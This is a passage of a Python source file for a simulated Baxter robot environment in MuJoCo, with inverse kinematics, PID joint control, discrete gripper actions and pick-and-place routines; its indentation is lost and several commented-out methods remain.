# raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
# return self._obs_inds[obs_type]
# def get_obs_shape(self, obs_type):
# if obs_type not in self._obs_inds:
# raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
# return self._obs_shape[obs_type]
# def get_obs_data(self, obs, obs_type):
# if obs_type not in self._obs_inds:
# raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
# return obs[self._obs_inds[obs_type]].reshape(self._obs_shape[obs_type])
def get_arm_section_inds(self, section_name):
inds = self.get_obs_inds('joints')
if section_name == 'lArmPose':
return inds[9:16]
if section_name == 'lGripper':
return inds[16:]
if section_name == 'rArmPose':
return inds[:7]
if section_name == 'rGripper':
return inds[7:8]
def get_left_ee_pos(self, mujoco_frame=True):
model = self.physics.model
ind = model.name2id('left_gripper', 'body')
pos = self.physics.data.xpos[ind].copy()
if not mujoco_frame:
pos[2] -= MUJOCO_MODEL_Z_OFFSET
pos[0] -= MUJOCO_MODEL_X_OFFSET
return pos
def get_right_ee_pos(self, mujoco_frame=True):
model = self.physics.model
ind = model.name2id('right_gripper', 'body')
pos = self.physics.data.xpos[ind].copy()
if not mujoco_frame:
pos[2] -= MUJOCO_MODEL_Z_OFFSET
pos[0] -= MUJOCO_MODEL_X_OFFSET
return pos
def get_left_ee_rot(self, mujoco_frame=True):
model = self.physics.model
ind = model.name2id('left_gripper', 'body')
quat = self.physics.data.xquat[ind].copy()
return quat
def get_right_ee_rot(self, mujoco_frame=True):
model = self.physics.model
ind = model.name2id('right_gripper', 'body')
quat = self.physics.data.xquat[ind].copy()
return quat
def get_item_pos(self, name, mujoco_frame=True, rot=False):
if name.find('ee_pos') >= 0:
if name.find('left') >= 0:
return self.get_left_ee_pos(mujoco_frame)
elif name.find('right') >= 0:
return self.get_right_ee_pos(mujoco_frame)
if name.find('ee_quat') >= 0:
if name.find('left') >= 0:
return self.get_left_ee_rot(mujoco_frame)
elif name.find('right') >= 0:
return self.get_right_ee_rot(mujoco_frame)
return super(BaxterMJCEnv, self).get_item_pos(name, mujoco_frame, rot)
def get_item_rot(self, name, mujoco_frame=True, to_euler=False):
if name.find('ee_quat') >= 0:
if name.find('left') >= 0:
rot = self.get_left_ee_rot(mujoco_frame)
elif name.find('right') >= 0:
rot = self.get_right_ee_rot(mujoco_frame)
if to_euler: rot = T.quaternion_to_euler(rot, order='xyzw')
return rot
return super(BaxterMJCEnv, self).get_item_rot(name, mujoco_frame, to_euler)
#def get_item_pos(self, name, mujoco_frame=True):
# model = self.physics.model
# try:
# ind = model.name2id(name, 'joint')
# adr = model.jnt_qposadr[ind]
# pos = self.physics.data.qpos[adr:adr+3].copy()
# except Exception as e:
# try:
# item_ind = model.name2id(name, 'body')
# pos = self.physics.data.xpos[item_ind].copy()
# except:
# item_ind = -1
# if not mujoco_frame:
# pos[2] -= MUJOCO_MODEL_Z_OFFSET
# pos[0] -= MUJOCO_MODEL_X_OFFSET
# return pos
#def set_item_pos(self, name, pos, mujoco_frame=True, forward=True):
# if not mujoco_frame:
# pos = [pos[0]+MUJOCO_MODEL_X_OFFSET, pos[1], pos[2]+MUJOCO_MODEL_Z_OFFSET]
# item_type = 'joint'
# try:
# ind = self.physics.model.name2id(name, 'joint')
# adr = self.physics.model.jnt_qposadr[ind]
# old_pos = self.physics.data.qpos[adr:adr+3]
# self.physics.data.qpos[adr:adr+3] = pos
# except Exception as e:
# try:
# ind = self.physics.model.name2id(name, 'body')
# old_pos = self.physics.data.xpos[ind]
# self.physics.data.xpos[ind] = pos
# # self.physics.model.body_pos[ind] = pos
# # old_pos = self.physics.model.body_pos[ind]
# item_type = 'body'
# except:
# item_type = 'unknown'
# if forward:
# self.physics.forward()
# # try:
# # self.physics.forward()
# # except PhysicsError as e:
# # print e
# # traceback.print_exception(*sys.exc_info())
# # print '\n\n\n\nERROR IN SETTING {0} POSE.\nPOSE TYPE: {1}.\nRESETTING SIMULATION.\n\n\n\n'.format(name, item_type)
# # qpos = self.physics.data.qpos.copy()
# # xpos = self.physics.data.xpos.copy()
# # if item_type == 'joint':
# # qpos[adr:adr+3] = old_pos
# # elif item_type == 'body':
# # xpos[ind] = old_pos
# # self.physics.reset()
# # self.physics.data.qpos[:] = qpos[:]
# # self.physics.data.xpos[:] = xpos[:]
# # self.physics.forward()
## def get_pos_from_label(self, label, mujoco_frame=True):
## if label in self._item_map:
## return self.get_item_pos(label, mujoco_frame)
## return None
def get_joint_angles(self):
return self.physics.data.qpos[1:19].copy()
def get_arm_joint_angles(self):
inds = [1, 2, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16]
return self.physics.data.qpos[inds].copy()
def set_arm_joint_angles(self, jnts):
inds = [1, 2, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16]
self.physics.data.qpos[inds] = jnts
self.physics.data.qvel[inds] = 0
self.physics.data.qacc[inds] = 0
self.physics.forward()
def set_gripper_joint_angles(self, jnts):
inds = [8, 17]
self.physics.data.qpos[inds] = jnts
self.physics.data.qvel[inds] = 0
self.physics.data.qacc[inds] = 0
self.physics.forward()
def get_gripper_joint_angles(self):
inds = [8, 17]
return self.physics.data.qpos[inds]
def _get_joints(self, act_index):
if act_index in self._joint_map_cache:
return self._joint_map_cache[act_index]
res = []
for name, attr in self.action_inds:
inds = self.action_inds[name, attr]
# Actions have a single gripper command, but MUJOCO uses two gripper joints
if act_index in inds:
if attr == 'lGripper':
res = [('left_gripper_l_finger_joint', 1), ('left_gripper_r_finger_joint', -1)]
elif attr == 'rGripper':
res = [('right_gripper_r_finger_joint', 1), ('right_gripper_l_finger_joint', -1)]
elif attr == 'lArmPose':
arm_ind = inds.tolist().index(act_index)
res = [(MUJOCO_JOINT_ORDER[9+arm_ind], 1)]
elif attr == 'rArmPose':
arm_ind = inds.tolist().index(act_index)
res = [(MUJOCO_JOINT_ORDER[arm_ind], 1)]
self._joint_map_cache[act_index] = res
return res
def get_action_meanings(self):
# For discrete action mode
return ['NOOP', 'RIGHT_EE_FORWARD', 'RIGHT_EE_BACK', 'RIGHT_EE_LEFT', 'RIGHT_EE_RIGHT',
'RIGHT_EE_UP', 'RIGHT_EE_DOWN', 'RIGHT_EE_OPEN', 'RIGHT_EE_CLOSE',
'LEFT_EE_FORWARD', 'LEFT_EE_BACK', 'LEFT_EE_LEFT', 'LEFT_EE_RIGHT',
'LEFT_EE_UP', 'LEFT_EE_DOWN', 'LEFT_EE_OPEN', 'LEFT_EE_CLOSE']
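# Illustrative note: in discrete mode the integer action indexes the list above, e.g.
# env.step(5, mode='discrete_pos') dispatches to move_right_gripper_up() ('RIGHT_EE_UP').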
def move_right_gripper_forward(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[0] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_backward(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[0] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_left(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[1] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_right(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[1] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_up(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[2] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_down(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[2] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def open_right_gripper(self):
act = np.zeros(8)
act[3] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def close_right_gripper(self):
act = np.zeros(8)
act[3] = 0
return self.step(act, mode='end_effector_pos')
def move_left_gripper_forward(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[4] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_backward(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[4] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_left(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[5] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_right(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[5] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_up(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[6] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_down(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[6] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def open_left_gripper(self):
act = np.zeros(8)
act[7] = 0.02
return self.step(act, mode='end_effector_pos')
def close_left_gripper(self):
act = np.zeros(8)
act[7] = 0
return self.step(act, mode='end_effector_pos')
def _step_joint(self, joint, error):
ctrl_data = self.ctrl_data[joint]
gains = BAXTER_GAINS[joint]
dt = MJC_TIME_DELTA
de = error - ctrl_data['prev_err']
ctrl_data['cp'] = error
ctrl_data['cd'] = de / dt
ctrl_data['ci'] += error * dt
ctrl_data['prev_err'] = error
return gains[0] * ctrl_data['cp'] + \
gains[1] * ctrl_data['cd'] + \
gains[2] * ctrl_data['ci']
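# Note: this is a standard PID control law, u = Kp*e + Kd*(de/dt) + Ki*integral(e)dt,
# with the per-joint gains taken from BAXTER_GAINS[joint] in the order (Kp, Kd, Ki).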
def _clip_joint_angles(self, r_jnts, r_grip, l_jnts, l_grip):
DOF_limits = self._ikbody.env_body.GetDOFLimits()
left_DOF_limits = (DOF_limits[0][2:9]+0.001, DOF_limits[1][2:9]-0.001)
right_DOF_limits = (DOF_limits[0][10:17]+0.001, DOF_limits[1][10:17]-0.001)
if r_grip[0] < 0:
r_grip[0] = 0
if r_grip[0] > 0.02:
r_grip[0] = 0.02
if l_grip[0] < 0:
l_grip[0] = 0
if l_grip[0] > 0.02:
l_grip[0] = 0.02
for i in range(7):
if l_jnts[i] < left_DOF_limits[0][i]:
l_jnts[i] = left_DOF_limits[0][i]
if l_jnts[i] > left_DOF_limits[1][i]:
l_jnts[i] = left_DOF_limits[1][i]
if r_jnts[i] < right_DOF_limits[0][i]:
r_jnts[i] = right_DOF_limits[0][i]
if r_jnts[i] > right_DOF_limits[1][i]:
r_jnts[i] = right_DOF_limits[1][i]
def _calc_ik(self, pos, quat, arm, check_limits=True):
lb, ub = self.geom.get_arm_bnds()
ranges = (np.array(ub) - np.array(lb)).tolist()
jnt_ids = sorted(self.geom.get_free_inds())
jnts = P.getJointStates(self.geom.id, jnt_ids)
rest_poses = []
arm_inds = self.geom.get_arm_inds(arm)
arm_jnts = self.geom.jnt_names[arm]
cur_jnts = self.get_joints(arm_jnts, vec=True)
for ind, jnt_id in enumerate(jnt_ids):
if jnt_id in arm_inds:
rest_poses.append(cur_jnts[arm_inds.index(jnt_id)])
else:
rest_poses.append(jnts[ind][0])
manip_id = self.geom.get_ee_link(arm)
damp = (0.1 * np.ones(len(jnt_ids))).tolist()
joint_pos = P.calculateInverseKinematics(self.geom.id,
manip_id,
pos,
quat,
lowerLimits=lb,
upperLimits=ub,
jointRanges=ranges,
restPoses=rest_poses,
jointDamping=damp,
maxNumIterations=128)
inds = list(self.geom.get_free_inds(arm))
joint_pos = np.array(joint_pos)[inds].tolist()
return joint_pos
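# Note (assuming P is the pybullet module): calculateInverseKinematics runs PyBullet's
# iterative numerical IK; restPoses bias the solver toward the current joint configuration
# so a redundant arm does not jump between equivalent solutions on successive calls.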
#def _calc_ik(self, pos, quat, use_right=True, check_limits=True):
# arm_jnts = self.get_arm_joint_angles()
# grip_jnts = self.get_gripper_joint_angles()
# cmd = {'dpos': pos+np.array([0,0,MUJOCO_MODEL_Z_OFFSET]), 'rotation': [quat[1], quat[2], quat[3], quat[0]]}
# jnt_cmd = self._ikcontrol.joint_positions_for_eef_command(cmd, use_right)
# if use_right:
# if jnt_cmd is None:
# print('Cannot complete action; ik will cause unstable control')
# return arm_jnts[:7]
# else:
# if jnt_cmd is None:
# print('Cannot complete action; ik will cause unstable control')
# return arm_jnts[7:]
# return jnt_cmd
#def _check_ik(self, pos, quat=DOWN_QUAT, use_right=True):
# cmd = {'dpos': pos+np.array([0,0,MUJOCO_MODEL_Z_OFFSET]), 'rotation': [quat[1], quat[2], quat[3], quat[0]]}
# jnt_cmd = self._ikcontrol.joint_positions_for_eef_command(cmd, use_right)
# return jnt_cmd is not None
def step(self, action, mode=None, obs_include=None, gen_obs=True, view=False, debug=False):
start_t = time.time()
if mode is None:
mode = self.ctrl_mode
cmd = np.zeros((18))
abs_cmd = np.zeros((18))
r_grip = 0
l_grip = 0
cur_left, cur_right = self.get_attr('baxter', 'left'), self.get_attr('baxter', 'right')
if mode == 'joint_angle':
if type(action) is dict:
left = cur_left + action.get('left', np.zeros(7))
right = cur_right + action.get('right', np.zeros(7))
r_grip = action.get('right_gripper', 0)
l_grip = action.get('left_gripper', 0)
abs_cmd[:7] = right
abs_cmd[9:16] = left
else:
for i in range(len(action)):
jnts = self._get_joints(i)
for jnt in jnts:
cmd_angle = jnt[1] * action[i]
ind = MUJOCO_JOINT_ORDER.index(jnt[0])
abs_cmd[ind] = cmd_angle
r_grip = action[7]
l_grip = action[15]
elif mode == 'end_effector':
# Action Order: ee_right_pos, ee_right_quat, ee_right_grip, ee_left_pos, ee_left_quat, ee_left_grip
cur_right_ee_pos = self.get_right_ee_pos()
cur_right_ee_rot = self.get_right_ee_rot()
cur_left_ee_pos = self.get_left_ee_pos()
cur_left_ee_rot = self.get_left_ee_rot()
if type(action) is dict:
right_ee_cmd, left_ee_cmd = action['right_ee_pos'], action['left_ee_pos']
right_ee_rot, left_ee_rot = action['right_ee_rot'], action['left_ee_rot']
r_grip, l_grip = action['right_gripper'], action['left_gripper']
else:
right_ee_cmd, left_ee_cmd = action[:3], action[8:11]
right_ee_rot, left_ee_rot = action[3:7], action[11:15]
r_grip, l_grip = action[7], action[15]
target_right_ee_pos = cur_right_ee_pos + right_ee_cmd
target_right_ee_rot = right_ee_rot # cur_right_ee_rot + action[3:7]
target_left_ee_pos = cur_left_ee_pos + left_ee_cmd
target_left_ee_rot = left_ee_rot # cur_left_ee_rot + action[11:15]
# target_right_ee_rot /= np.linalg.norm(target_right_ee_rot)
# target_left_ee_rot /= np.linalg.norm(target_left_ee_rot)
right_cmd = self._calc_ik(target_right_ee_pos,
target_right_ee_rot,
'right')
left_cmd = self._calc_ik(target_left_ee_pos,
target_left_ee_rot,
'left')
abs_cmd[:7] = right_cmd
abs_cmd[9:16] = left_cmd
# r_grip and l_grip were already set above for both the dict and array forms of the action
elif mode == 'end_effector_pos':
# Action Order: ee_right_pos, ee_right_quat, ee_right_grip, ee_left_pos, ee_left_quat, ee_left_grip
cur_right_ee_pos = self.get_right_ee_pos()
cur_left_ee_pos = self.get_left_ee_pos()
if type(action) is dict:
right_ee_cmd, left_ee_cmd = action.get('right_ee_pos', (0,0,0)), action.get('left_ee_pos', (0,0,0))
r_grip, l_grip = action.get('right_gripper', 0), action.get('left_gripper', 0)
else:
right_ee_cmd, left_ee_cmd = action[:3], action[4:7]
r_grip, l_grip = action[3], action[7]
target_right_ee_pos = cur_right_ee_pos + right_ee_cmd
target_right_ee_rot = START_EE[3:7]
target_left_ee_pos = cur_left_ee_pos + left_ee_cmd
target_left_ee_rot = START_EE[10:14]
right_cmd = self._calc_ik(target_right_ee_pos,
target_right_ee_rot,
'right')
left_cmd = self._calc_ik(target_left_ee_pos,
target_left_ee_rot,
'left')
abs_cmd[:7] = right_cmd
abs_cmd[9:16] = left_cmd
elif mode == 'discrete_pos':
if action == 1: return self.move_right_gripper_forward()
if action == 2: return self.move_right_gripper_backward()
if action == 3: return self.move_right_gripper_left()
if action == 4: return self.move_right_gripper_right()
if action == 5: return self.move_right_gripper_up()
if action == 6: return self.move_right_gripper_down()
if action == 7: return self.open_right_gripper()
if action == 8: return self.close_right_gripper()
if action == 9: return self.move_left_gripper_forward()
if action == 10: return self.move_left_gripper_backward()
if action == 11: return self.move_left_gripper_left()
if action == 12: return self.move_left_gripper_right()
if action == 13: return self.move_left_gripper_up()
if action == 14: return self.move_left_gripper_down()
if action == 15: return self.open_left_gripper()
if action == 16: return self.close_left_gripper()
return self.get_obs(view=view), \
self.compute_reward(), \
False, \
{}
for t in range(self.sim_freq): # range(int(1/(4*self.timestep))):
error = abs_cmd - self.physics.data.qpos[1:19]
cmd = ERROR_COEFF * error
# cmd[cmd > 0.25] = 0.25
# cmd[cmd < -0.25] = -0.25
cmd[7] = OPEN_VAL if r_grip > 0.0165 else CLOSE_VAL
cmd[8] = cmd[7]
cmd[16] = OPEN_VAL if l_grip > 0.0165 else CLOSE_VAL
cmd[17] = cmd[16]
# cmd[7] = 0.03 if r_grip > 0.0165 else -0.01
# cmd[8] = -cmd[7]
# cmd[16] = 0.03 if l_grip > 0.0165 else -0.01
# cmd[17] = -cmd[16]
cur_state = self.physics.data.qpos.copy()
self.physics.set_control(cmd)
try:
self.physics.step()
except PhysicsError as e:
traceback.print_exception(*sys.exc_info())
print('\n\nERROR IN PHYSICS SIMULATION; RESETTING ENV.\n\n')
self.physics.reset()
self.physics.data.qpos[:] = cur_state[:]
self.physics.forward()
# self.render(camera_id=1, view=True)
if not gen_obs and not view: return
return self.get_obs(obs_include=obs_include, view=view), \
self.compute_reward(), \
self.is_done(), \
{}
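# Example (illustrative, assuming env is a BaxterMJCEnv instance): a relative joint-angle
# command for both arms through the dict interface.
# action = {'right': np.zeros(7), 'left': 0.05 * np.ones(7), 'right_gripper': 0.02, 'left_gripper': 0.}
# obs, reward, done, info = env.step(action, mode='joint_angle')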
# def compute_reward(self):
# return 0
# def is_done(self):
# return self._cur_iter >= self._max_iter
# def render(self, mode='rgb_array', height=0, width=0, camera_id=0,
# overlays=(), depth=False, scene_option=None, view=True):
# # Make friendly with dm_control or gym interface
# depth = depth or mode == 'depth_array'
# view = view or mode == 'human'
# if height == 0: height = self.im_height
# if width == 0: width = self.im_wid
# pixels = self.physics.render(height, width, camera_id, overlays, depth, scene_option)
# if view and self.use_viewer:
# self._render_viewer(pixels)
# return pixels
def reset(self):
# self._cur_iter = 0
# self.physics.reset()
# self._reload_viewer()
# self.ctrl_data = {}
# self.cur_time = 0.
# self.prev_time = 0.
self._cur_iter = 0
self.physics.data.qpos[1:8] = self._calc_ik(START_EE[:3], START_EE[3:7], 'right', False)
self.physics.data.qpos[10:17] = self._calc_ik(START_EE[7:10], START_EE[10:14], 'left', False)
obs = super(BaxterMJCEnv, self).reset()
for joint in BAXTER_GAINS:
self.ctrl_data[joint] = {
'prev_err': 0.,
'cp': 0.,
'cd': 0.,
'ci': 0.,
}
return obs
@classmethod
def init_from_plan(cls, plan, view=True):
items = []
for p in list(plan.params.values()):
if p.is_symbol(): continue
param_xml = get_param_xml(p)
if param_xml is not None:
items.append(param_xml)
# Construct a new instance rather than calling __init__ directly on the class
return cls(view, items)
def sim_from_plan(self, plan, t):
model = self.physics.model
xpos = model.body_pos.copy()
xquat = model.body_quat.copy()
param = list(plan.params.values())
for param_name in plan.params:
param = plan.params[param_name]
if param.is_symbol(): continue
if param._type != 'Robot':
if param.name in self._ind_cache:
param_ind = self._ind_cache[param.name]
else:
try:
param_ind = model.name2id(param.name, 'body')
except:
param_ind = -1
self._ind_cache[param.name] = -1
if param_ind == -1: continue
pos = param.pose[:, t]
xpos[param_ind] = pos + np.array([MUJOCO_MODEL_X_OFFSET, 0, MUJOCO_MODEL_Z_OFFSET])
if hasattr(param, 'rotation'):
rot = param.rotation[:, t]
mat = OpenRAVEBody.transform_from_obj_pose([0,0,0], rot)[:3,:3]
xquat[param_ind] = openravepy.quatFromRotationMatrix(mat)
self.physics.data.xpos[:] = xpos[:]
self.physics.data.xquat[:] = xquat[:]
model.body_pos[:] = xpos[:]
model.body_quat[:] = xquat[:]
baxter = plan.params['baxter']
self.physics.data.qpos[1:8] = baxter.rArmPose[:, t]
self.physics.data.qpos[8] = baxter.rGripper[:, t]
self.physics.data.qpos[9] = -baxter.rGripper[:, t]
self.physics.data.qpos[10:17] = baxter.lArmPose[:, t]
self.physics.data.qpos[17] = baxter.lGripper[:, t]
self.physics.data.qpos[18] = -baxter.lGripper[:, t]
self.physics.forward()
def mp_state_from_sim(self, plan):
X = np.zeros(plan.symbolic_bound)
for param_name, attr_name in plan.state_inds:
inds = plan.state_inds[param_name, attr_name]
if param_name in plan.params:
param = plan.params[param_name]
if param_name == 'baxter':
pass
elif not param.is_symbol():
if attr_name == 'pose':
X[inds] = self.get_item_pos(param_name)
elif attr_name == 'rotation':
X[inds] = self.get_item_rot(param_name, to_euler=True)
return X
def jnt_ctrl_from_plan(self, plan, t):
baxter = plan.params['baxter']
lArmPose = baxter.lArmPose[:, t]
lGripper = baxter.lGripper[:, t]
rArmPose = baxter.rArmPose[:, t]
rGripper = baxter.rGripper[:, t]
ctrl = np.r_[rArmPose, rGripper, -rGripper, lArmPose, lGripper, -lGripper]
# step() does not accept a 'joint_angles' keyword; pass the command as the action in joint-angle mode
return self.step(ctrl, mode='joint_angle')
def run_plan(self, plan):
self.reset()
obs = []
for t in range(plan.horizon):
obs.append(self.jnt_ctrl_from_plan(plan, t))
return obs
def _move_to(self, pos, gripper1, gripper2, left=True, view=False):
observations = [self.get_obs(view=False)]
if not self._check_ik(pos, quat=DOWN_QUAT, use_right=not left):
return observations
limit1 = np.array([0.01, 0.01, 0.035])
limit2 = np.array([0.005, 0.005, 0.01])
ee_above = pos + np.array([0.0, 0, 0.2])
ee_above[2] = np.minimum(ee_above[2], 0.6)
inds = ([[4,5,6]], 7) if left else ([[0,1,2]], 3)
aux_inds = ([[0,1,2]], 3) if left else ([[4,5,6]], 7)
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
aux_ee_pos = [0.6, -0.5, 0.2] if left else [0.6, 0.5, 0.2]
end_ee_pos = [0.6, 0.5, 0.2] if left else [0.6, -0.5, 0.2]
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
max_iter = 20
cur_iter = 0
while np.any(np.abs(ee_pos - ee_above) > limit1) or gripper_angle < gripper1*0.015:
next_ee_cmd = np.minimum(np.maximum(ee_above - ee_pos, -0.2*np.ones((3,))), 0.2*np.ones((3,)))
# next_ee_cmd = ee_above - ee_pos
# next_ee_cmd[2] += 0.03
next_cmd = np.zeros((8,))
next_cmd[inds[0]] = next_ee_cmd
next_cmd[inds[1]] = gripper1
cur_aux_ee_pos = self.get_right_ee_pos() if left else self.get_left_ee_pos()
next_cmd[aux_inds[0]] = aux_ee_pos - cur_aux_ee_pos
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
cur_iter += 1
if cur_iter > max_iter and np.all(np.abs(ee_pos - ee_above)[:2] < 0.05): break
if cur_iter > 2*max_iter: break
next_cmd = np.zeros((8,))
next_cmd[inds[1]] = gripper1
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
max_iter = 15
cur_iter = 0
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
while np.any(np.abs(ee_pos - pos) > limit2):
next_ee_cmd = np.minimum(np.maximum(pos - ee_pos, -0.05*np.ones((3,))), 0.05*np.ones((3,)))
# next_ee_cmd = pos - ee_pos
next_ee_cmd[2] += 0.01
next_ee_cmd[0] -= 0.01
next_cmd = np.zeros((8,))
next_cmd[inds[0]] = next_ee_cmd
next_cmd[inds[1]] = gripper1
cur_aux_ee_pos = self.get_right_ee_pos() if left else self.get_left_ee_pos()
next_cmd[aux_inds[0]] = aux_ee_pos - cur_aux_ee_pos
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
cur_iter += 1
if cur_iter > max_iter: break
next_cmd = np.zeros((8,))
next_cmd[inds[1]] = gripper2
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
cur_iter = 0
max_iter = 5
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
while np.any(np.abs(ee_pos - ee_above) > limit1):
next_ee_cmd = np.minimum(np.maximum(ee_above - ee_pos, -0.1*np.ones((3,))), 0.1*np.ones((3,)))
# next_ee_cmd = ee_above - ee_pos
next_cmd = np.zeros((8,))
next_cmd[inds[0]] = next_ee_cmd
next_cmd[inds[1]] = gripper2
cur_aux_ee_pos = self.get_right_ee_pos() if left else self.get_left_ee_pos()
next_cmd[aux_inds[0]] = aux_ee_pos - cur_aux_ee_pos
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
cur_iter += 1
if cur_iter > max_iter: break
# cur_iter = 0
# max_iter = 10
# ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
# gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
# while np.any(np.abs(ee_pos - end_ee_pos) > limit1):
# next_ee_cmd = np.minimum(np.maximum(end_ee_pos - ee_pos, -0.1*np.ones((3,))), 0.1*np.ones((3,)))
# # next_ee_cmd = ee_above - ee_pos
# next_cmd = np.zeros((8,))
# next_cmd[inds[0]] = next_ee_cmd
# next_cmd[inds[1]] = gripper2
# cur_aux_ee_pos = self.get_right_ee_pos() if left else self.get_left_ee_pos()
# next_cmd[aux_inds[0]] = aux_ee_pos - cur_aux_ee_pos
# obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# # observations.append((next_cmd, obs))
# observations.append(obs)
# ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
# gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
# cur_iter += 1
# if cur_iter > max_iter: break
return observations
# def move_left_to_grasp(self, item_name, view=False):
# item_pos = self.get_item_pos(item_name)
# return self._move_to(item_pos, 1, 0, True, view)
def move_left_to_grasp(self, pos, view=False):
return self._move_to(pos, 1, 0, True, view)
def move_left_to_place(self, target_pos, view=False):
return self._move_to(target_pos, 0, 1, True, view)
def move_left_to(self, pos1, pos2, reset_arm=True, view=True):
if pos1[1] < -0.2 or pos2[1] < -0.2 or pos1[1] > 0.8 or pos2[1] > 0.8:
return [self.get_obs(view=False)]
if not (self._check_ik(pos1, quat=DOWN_QUAT, use_right=False) and \
self._check_ik(pos2, quat=DOWN_QUAT, use_right=False)):
return [self.get_obs(view=False)]
self.physics.data.qpos[8] = 0.03
self.physics.data.qpos[9] = -0.03
self.physics.data.qpos[17] = 0.03
self.physics.data.qpos[18] = -0.03
self.physics.forward()
start_jnts = self.get_arm_joint_angles()
obs1 = self.move_left_to_grasp(pos1, view)
obs2 = self.move_left_to_place(pos2, view)
if reset_arm:
self.set_arm_joint_angles(start_jnts)
self.physics.forward()
return np.r_[obs1, obs2]
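# Example (illustrative): a simple left-arm pick-and-place between two workspace positions.
# Note that this path relies on _check_ik, which is commented out above in this version.
# obs_seq = env.move_left_to(np.array([0.7, 0.3, 0.]), np.array([0.7, 0.5, 0.]))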
# def move_right_to_grasp(self, item_name, view=False):
# item_pos = self.get_item_pos(item_name)
# return self._move_to(item_pos, 1, 0, False, view)
def move_right_to_grasp(self, pos, view=False):
return self._move_to(pos, 1, 0, False, view)
def move_right_to_place(self, target_pos, view=False):
return self._move_to(target_pos, 0, 1, False, view)
def move_right_to(self, pos1, pos2, reset_arm=True, view=True):
if pos1[1] > 0.2 or pos2[1] > 0.2 or pos1[1] < -0.8 or pos2[1] < -0.8:
return [self.get_obs(view=False)]
if not (self._check_ik(pos1, quat=DOWN_QUAT, use_right=True) and \
self._check_ik(pos2, quat=DOWN_QUAT, use_right=True)):
return [self.get_obs(view=False)]
self.physics.data.qpos[8] = 0.03
self.physics.data.qpos[9] = -0.03
self.physics.data.qpos[17] = 0.03
self.physics.data.qpos[18] = -0.03
self.physics.forward()
start_jnts = self.get_arm_joint_angles()
